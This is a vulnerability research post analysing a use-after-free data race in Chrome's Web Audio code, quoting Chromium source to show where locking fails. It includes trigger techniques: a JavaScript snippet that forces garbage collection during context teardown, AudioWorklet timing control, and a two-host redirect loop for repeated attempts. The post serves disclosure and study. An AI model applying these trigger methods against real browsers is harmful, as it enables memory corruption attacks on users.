In this post and the next we’ll review the details of some use-after-free bugs that I found in the Web Audio module in Google Chrome. Although the vulnerabilities are found in Web Audio, the way they’re triggered involves more general techniques, which will be the focus of these posts.
More specifically, we’ll review a use-after-free that’s triggered by a data race, along with how to trigger it using some internals of the garbage collector. While the bug is fairly hard to exploit, the way to trigger it is interesting.
Web Audio
The vulnerability is found in the web audio module in blink, which runs in the renderer and hence sandboxed. It is the implementation for the Web Audio API in Chrome. In October 2019, Anton Ivanov and Alexey Kulaev at Kaspersky reported a vulnerability in this module that was exploited in the wild. Since then, Sergei Glazunov of Google Project Zero has carried out variant analysis using CodeQL and discovered three variants of this bug (See also Maddie Stone’s presentation at BlueHat IL for more background)
I’ll now go through some concepts in web audio that are required to understand the issues covered in this and the next post. Before reading this, it will be helpful to familiarize yourself with Web Audio’s basic concepts documented here.
BaseAudioContext, AudioNode and AudioHandler
BaseAudioContext
is the implementation of BaseAudioContext
of the Web Audio API. It provides the rendering context for creation of AudioNode
, which is used for building graphs to process audio input. For more information, review the concepts behind the Web Audio API.
AudioNode
provides an interface to Javascript and delegates its operations to AudioHandler
. Each AudioNode
holds an AudioHandler
that is responsible for its implementation as a scoped_refptr
and thereby keeping it alive. An AudioNode
also holds the BaseAudioContext
that it’s created in as a Member
, meaning that a BaseAudioContext
cannot be garbage collected until all AudioNode
objects that it created are garbage collected.
Rendering graph pulling and ownership transfer of AudioHandler
Each BaseAudioContext
holds a special AudioNode
that is derived from AudioDestinationNode
as a Member
. This node implements the necessary methods for tracking down the audio graph and rendering the audio input. For example, the OfflineAudioContext
implements it in the DoOfflineRendering
method.
During rendering, if an AudioNode
gets garbage collected, the AudioHandler
that’s used for rendering may get deleted and cause use-after-free bugs, such as what happen in this issue. To prevent such vulnerabilities, when an AudioNode
gets garbage collected (which happens on the main thread), if rendering is happening in the audio thread, it transfers ownership of its AudioHandler
to the DeferredTaskHandler
, which keeps the handler alive until the current rendering unit (quantum) is done. Clearing out these orphan handlers happens either at the end of the quantum, when RequestToDeleteHandlersOnMainThread is called or when ClearHandlersToBeDeleted is called when the execution context (e.g. webpage, iframe etc.) is destroyed. Both of these will clear out rendering_orphan_handlers_
and may delete the AudioHandler that’s transferred to it.
GraphAutoLocker
and tear_down_mutex_
As AudioHandler
objects are often accessed in the audio thread, while they’re destroyed in the main thread, care must be taken to prevent them from being accessed while the main thread is trying to destroy them. This is usually done using the GraphAutoLocker
and the more recently introduced tear_down_mutex_
. Access to AudioHandler
objects in the audio thread must be protected by either of these locks to prevent any use-after-free caused by a data race. There are also other more fine-grained locks that are specific to some nodes, such as the process_lock_
that’s relevant to the issues found by Anton Ivanov and Alexey Kulaev (at Kaspersky) and Sergei Glazunov of Google Project Zero mentioned in the introduction.
The vulnerability
The current issue is a use-after-free caused by a data race where access to AudioHandler
isn’t protected. It’s fairly easy to trigger on the master branch at the time of report (@f440b57), where the tear_down_mutex_
is removed, but triggering it on the release branch (80.0.3987.132) is a lot more interesting and what we’ll start to review.
On 80.0.3987.132, the rendering method in OfflineAudioDestinationNode
contains the following code:
{
MutexTryLocker try_locker(Context()->GetTearDownMutex());
if (try_locker.Locked()) {
DCHECK_GE(NumberOfInputs(), 1u);
// This will cause the node(s) connected to us to process, which in turn
// will pull on their input(s), all the way backwards through the
// rendering graph.
AudioBus* rendered_bus = Input(0).Pull(destination_bus, number_of_frames);
if (!rendered_bus) {
destination_bus->Zero();
} else if (rendered_bus != destination_bus) {
// in-place processing was not possible - so copy
destination_bus->CopyFrom(*rendered_bus);
}
} else {
destination_bus->Zero();
}
// Process nodes which need a little extra help because they are not
// connected to anything, but still need to process.
Context()->GetDeferredTaskHandler().ProcessAutomaticPullNodes( //<--- Only protected if try_locker succeeded
number_of_frames);
}
Note that the above snippet tries to acquire the tear down lock, and if it succeeds, it performs Input(0).Pull(...)
. However, ProcessAutomaticPullNodes
is performed regardless of whether the lock is acquired successfully. Inside the ProcessAutomaticPullNodes
method, the AudioHandler
in rendering_automatic_pull_handlers_
is accessed:
void DeferredTaskHandler::ProcessAutomaticPullNodes(
uint32_t frames_to_process) {
DCHECK(IsAudioThread());
for (unsigned i = 0; i < rendering_automatic_pull_handlers_.size(); ++i) {
rendering_automatic_pull_handlers_[i]->ProcessIfNecessary(
frames_to_process);
}
}
If the audio thread fails to acquire the tear down lock, then access to rendering_automatic_pull_handlers_
won’t be protected. While this looks like a candidate for data race, let’s take a look at what it takes to get a use-after-free bug out of this. The rendering_automatic_pull_handlers_
gets updated every time DeferredTaskHandler::UpdateAutomaticPullNodes
is called. This happens when HandlePreRenderTasks
is called, right before the audio thread tries to acquire the tear down lock:
if (Context()->HandlePreRenderTasks(nullptr, nullptr)) { //<--- Updates `rendering_automatic_pull_handlers_`
SuspendOfflineRendering();
return true;
}
{
MutexTryLocker try_locker(Context()->GetTearDownMutex());
if (try_locker.Locked()) {
DCHECK_GE(NumberOfInputs(), 1u);
And it is protected by the graph lock.
Updating rendering_automatic_pull_handlers_
means that any change to the graph, such as the destruction of AudioNode
that is needed to trigger a use-after-free, must happen after Context()->HandlePreRenderTasks
is called, or at least after rendering_automatic_pull_handlers_
is updated there, otherwise the AudioHandler
will be removed from rendering_automatic_pull_handlers_
and won’t be used again.
In order to cause a use-after-free in ProcessAutomaticPullNodes
, we first need to destroy the AudioNode
that holds the AudioHandler
in the rendering_automatic_pull_handlers_
. This requires a garbage collection of these AudioNode
to happen after rendering_automatic_pull_handlers_
is updated in the audio thread. As garbage collection will call AudioNode::Dispose
, which is locked by the graph lock, this can only happen after HandlePreRenderTasks
is completed. However, this is not enough to destroy AudioHandler
. As this is happening during the audio rendering, AudioNode
will transfer the ownership of the AudioHandler
to rendering_orphan_handlers_
in DeferredTaskHandler
, which means that after this point, both the rendering_orphan_handlers_
and rendering_automatic_pull_handlers_
will be responsible for keeping these handlers alive. Both of which are cleared when ClearHandlersToBeDeleted
is called:
void DeferredTaskHandler::ClearHandlersToBeDeleted() {
DCHECK(IsMainThread());
GraphAutoLocker locker(*this);
tail_processing_handlers_.clear();
rendering_orphan_handlers_.clear();
deletable_orphan_handlers_.clear();
automatic_pull_handlers_.clear();
rendering_automatic_pull_handlers_.clear();
active_source_handlers_.clear();
}
As rendering_automatic_pull_handlers_
is cleared last, calling ProcessAutomaticPullNodes
while rendering_automatic_pull_handlers_
is cleared may cause a use-after-free bug.
In order to cause an unprotected access to ProcessAutomaticPullNodes
, on the other hand, it requires the audio thread to fail in acquiring the tear down lock. This means that the BaseAudioContext::Uninitialize
method must be called before the audio thread tries to acquire the lock, and this will also call ClearHandlersToBeDeleted
to clear out the handles.
The following shows the order of events that needs to happen in both the main thread and the audio thread.
This means that on the main thread, a GC cycle needs to be started and completed, and then the execution context needs to be destroyed and BaseAudioContext::Uninitialize
called between the end of HandlePreRenderTasks
and Context()->GetTearDownMutex()
.
if (Context()->HandlePreRenderTasks(nullptr, nullptr)) {
...
//Destruction window, where GC needs to complete followed by a BaseAudioContext::Uninitialize called.
{
MutexTryLocker try_locker(Context()->GetTearDownMutex());
if (try_locker.Locked()) {
DCHECK_GE(NumberOfInputs(), 1u);
Unless there is a way to cause the two threads to run at a significantly different speed, it is impossible to fit all these in such a tight window. If anyone does know how to do that, please feel free to reach out as I’d be very interested to learn.
Triggering GC in BaseAudioContext::Uninitialize
Another idea is to see if there is any way to trigger GC in the BaseAudioContext::Uninitialize
method, before ClearHandlersToBeDeleted
is called. That way, we only need to time it so that BaseAudioContext::Uninitialize
is called before the audio thread got hold of the tear down lock, which is not difficult. As it turns out, the BaseAudioContext::Uninitialize
will call RejectPendingResolvers
before ClearHandlersToBeDeleted
is called to reject all the unresolved promises. In the OfflineAudioContext
, this will allocate a DOMException
for each unresolved promise:
void OfflineAudioContext::RejectPendingResolvers() {
...
for (auto& pending_suspend_resolver : scheduled_suspends_) {
pending_suspend_resolver.value->Reject(MakeGarbageCollected<DOMException>(
DOMExceptionCode::kInvalidStateError, "Audio context is going away")); //<--- Allocates GCed objects
}
...
}
Allocation of MakeGarbageCollected
will cause memory pressure and can potentially trigger a garbage collection. Trying to trigger GC using unresolved promises alone, however, is fairly difficult as DOMException
are small objects and it would require a prohibitively large amount of promises to trigger GC. We therefore need to build up memory pressure beforehand.
When a GarbageCollected
(on-heap) object is allocated, the AllocateObject
will first try to allocate the memory from existing free space that it manages, failing that, it will go to OutOfLineAllocate
to allocate some new free space and then allocate the object. After the object is allocated, OutOfLineAllocate
will call AllocatedObjectSizeSafepoint
, which, through a series of calls, will call EmbedderHeapTracer::IncreaseAllocatedSize
and then LocalEmbedderHeapTracer::StartIncrementalMarkingIfNeeded
.
void LocalEmbedderHeapTracer::StartIncrementalMarkingIfNeeded() {
if (!FLAG_global_gc_scheduling || !FLAG_incremental_marking) return;
Heap* heap = isolate_->heap();
heap->StartIncrementalMarkingIfAllocationLimitIsReached(
heap->GCFlagsForIncrementalMarking(),
kGCCallbackScheduleIdleGarbageCollection);
if (heap->AllocationLimitOvershotByLargeMargin()) {
heap->FinalizeIncrementalMarkingAtomically( //<--- Triggers a full GC
i::GarbageCollectionReason::kExternalFinalize);
}
}
At this point, if the heap->AllocationLimitOvershotByLargeMargin()
check passed, a full GC will be triggered, collecting both objects in the old space and the young space. This test essentially looks at how much memory is already allocated (but not yet collected) and sees how much it exceeded some threshold. The ‘overshoot’ value here is not just the amount of the current allocation, but also memory that has been allocated previously but not yet freed or collected. Once the overshoot value is high enough, a full GC will be triggered. The allocated value will then be adjusted, as well as the threshold. As the overshoot value takes into account all the memory that is currently allocated, by carefully controlling how much memory we allocated we can trigger GC even with a small memory allocation, such as the allocations of DOMException
in RejectPendingResolvers
.
Getting the timing right
After some experimentation, I managed to trigger GC during RejectPendingResolvers
, but only when I allocate a large amount of memory right before destroying the execution context. In my case, this sequence looks like:
//Prepare memory pressure
for (let i = 0; i < 180; i++) {
arr[i] = new Array(1024 * 1024);
arr[i].fill(1);
}
let frame = document.getElementById("ifrm");
//Trigger BaseAudioContext::Uninitialize and then GC within it.
frame.parentNode.removeChild(frame);
This is called from an iframe
that contains the relevant BaseAudioContext
, AudioHandler
etc. What happens in different threads is now the
The main problem with a large allocation is that it’s difficult to both land the BaseAudioContext::Uninitialize
and ClearHandlersToBeDeleted
in the right place, because any small fluctuation in the allocation time will cause big differences in the overall timing.
We use an AudioWorkletNode
to control the timing. As this node uses a user-supplied function to process the audio, I’m able to use it to control the timing in the audio thread. By using an AudioWorkletNode
with a delay that’s roughly equal to the time it takes between BaseAudioContext::Uninitialize
and ClearHandlersToBeDeleted
. I can get the ClearHandlersToBeDeleted
to run concurrently with ProcessAutomaticPullNodes
if I can get BaseAudioContext::Uninitialize
to land in this window:
if (!IsInitialized()) {
destination_bus->Zero();
return false;
}
//Window start to trigger `BaseAudioContext::Uninitialize`
if (Context()->HandlePreRenderTasks(nullptr, nullptr)) {
SuspendOfflineRendering();
return true;
}
//Window end to trigger `BaseAudioContext::Uninitialize`
{
MutexTryLocker try_locker(Context()->GetTearDownMutex());
For a component_build
, which is mostly used during development to speed up build time, the tear down lock somehow synchronizes the two threads. This is due to BaseAudioContext::Uninitialize
having to land while the AudioWorkletNode
is processing, and then having to wait for the tear down lock to release before it can continue, which is the time when BaseAudioContext::Uninitialize
is triggered. This is fairly consistent in relation to the rendering quantum. As it turns out, when this BaseAudioContext::Uninitialize
is called, it also lands in the appropriate window in the next rendering quantum. This makes it easy to control the timing and trigger the bug. On a non component build, although the tear down lock still synchronizes the threads in the same way, BaseAudioContext::Uninitialize
somehow triggers too early and misses the window. To synchronize the two threads, you would probably need to use currentFrame
in the AudioWorkletProcessor
, which can be accessible in both the audio and main threads to get the timing right. I believe this is doable, but rather tedious, and haven’t actually tried it myself.
Getting reliability through unlimited retries
As the data race issue relies on getting the timing right, it may requires multiple tries to trigger it. Normally, this can be done by reloading the page. However, because a reload does not reset the allocation threshold, which is crucial for triggering GC in the right place, reloading a page would not work in this case. However, this can be done by setting up two different hosts that host the same pages, and have them redirect to one another. Essentially, this reloads the page from a different host. By doing so, a new renderer is used to load the new page each time, thereby resetting the state of the allocation threshold (etc.). This means that the bug would likely to be triggered with just a single click that launched the page (after enough number of retries).